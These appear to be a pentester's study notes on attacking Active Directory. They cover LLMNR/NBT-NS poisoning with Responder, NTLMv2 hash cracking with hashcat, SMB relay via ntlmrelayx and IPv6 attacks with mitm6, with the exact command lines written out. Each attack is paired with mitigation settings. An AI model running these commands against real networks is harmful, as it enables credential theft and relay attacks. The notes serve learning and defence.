Responder / SMB Relay
Hacking Active directory
LLMNR Poisoning
DNS or NBT-NS. Responds with NTLMv2 hash.
responder -I eth0 -rdwv
hashcat -m 5600 hashes.txt rockyou.txt
Mitigation:
Disable LLMNR
Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client in the Group Policy Editor> "Turn OFF Multicast Name Resolution"
Disable NBT-NS
Network Connections > Network Adapter Properties > TCPv4 Properties > Advanced tab > WINS tab > select "Disable NetBIOS over TCP/IP"
(Else)
Require Network Access Control
Strong user passwords > 14 characters and limit common word usage.
SMB Relay
SMB signing must be disabled on target.
We can scan if host has SMB signing disabled using nessus, smbsign, nmap etc. Below is an namp scan result example where the SMB signing is 'not required' and can perform relay attacks on
Steps:
write target ip address to
targets.txtConfig responder to turn off 'HTTP' and 'SMB' to prevent responding to these protocols
/usr/share/responder/Responder./confUse
ntlmrelayx.py -tf targets.txt -smb2support
Mitigation:
Enable SMB signing on all
pro: completely stops attacks.
con: causes performance issues with file copying
Disable NTLM auth
pro: completely stops attacks
con: if kerberos stop working, windows default back to NTLM
Account tiering
pro: Limits domain admins to specific tasks
con: enforicing policy may be difficult
Local admin restriction
pro: prevents alot lateral movements.
con: potentially increase in amount of service desk tickets
SMB gaining shell access
IPv6 Attacks
mitm6 https://github.com/fox-it/mitm6
mitm6 -d adhacking.local
relay attack
Last updated